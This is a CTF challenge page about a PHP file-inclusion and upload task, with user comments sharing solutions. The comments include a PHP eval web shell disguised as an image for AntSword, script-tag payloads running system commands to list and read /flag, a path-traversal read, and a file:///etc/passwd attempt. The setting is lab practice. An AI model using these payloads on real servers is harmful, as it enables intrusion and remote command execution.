文件包含2WEB 未解决

分数: 35 金币: 4
题目作者: 未知
一  血: dotast
一血奖励: 3金币
解  决: 3028
提  示: 文件包含
描  述:
文件包含2
评论
liln0te 2年前

看了源码 这里屏蔽了伪协议,文件上传过滤了<?php 和 ?> 这两个 后面那个基本现在都不用了 短标签 `<?=`,`<?` script标签也可以

回复 3

lysr 2年前

桌面新建文本文档然后输入:<script language="php">@eval($_POST[pass])</script> 再重命名为xx.png,上传之后用中国蚁剑连http://114.67.246.176:16116/index.php?file=upload/202111161218016371.png,显示连接成功

回复 1

lysr 2年前

桌面新建文本文档然后输入:<script language="php">@eval($_POST[pass])</script> 再重命名为xx.png,上传之后用中国蚁剑连http://114.67.246.176:16116/index.php?file=upload/202111161218016371.png,显示连接成功

回复 0
109张某 9月前

大佬,中国蚁剑怎么连上的哦,他从服务器端直接过滤了php,直接就把最基本的连接类型阻断了,抓包也不能修改php类型

回复 0

admin138798 2年前

将<script language=php>system("cat /flag")</script>写成jpg文件上传直接访问就有flag了

回复 0

狐萝卜CarroT 2年前

什么意思,直接改成/flag就出来了

回复 0

zxmals 2年前

我这运气 file:///etc/passwd

回复 1

wINFerno 2年前

这题目我使用蚁剑连接不上,就写了<script language="php" >system('ls -al /')</script>查看目录 <script language="php" >system('tac /flag')</script>找到flag

回复 1

zhou0626 2年前

用蚁剑看了眼发现flag文件被放到了根目录

回复 0

andrewlong 2年前

/flag ??????

回复 2
守得云开见月明 2年前

@思南you flag是直接存放在根目录下的

回复 0

思南you 2年前

这是什么原理大佬

回复 0

王大发财 2年前

一个一个传的<script language=php>system("cat ../../../flag")</script>

回复 0

WriteUp

image
harry

4 金币

评分(5)

解题动态

1754436894 攻破了该题 1天前
山西小嫦娥 攻破了该题 2天前
mk012 攻破了该题 2天前
endual 攻破了该题 3天前
yybo 攻破了该题 6天前
18393236453 攻破了该题 6天前
zzpr 攻破了该题 6天前
gomber 攻破了该题 7天前
Yhaou- 攻破了该题 7天前
eren 攻破了该题 10天前
ctfshiyan 攻破了该题 10天前
liao1212 攻破了该题 10天前
Attack2Defense 攻破了该题 11天前
18370684622 攻破了该题 11天前
weekit 攻破了该题 11天前
caixvkun 攻破了该题 12天前
3060768013 攻破了该题 12天前
zhouyiwen 攻破了该题 13天前
liao1413 攻破了该题 13天前
ffffy 攻破了该题 15天前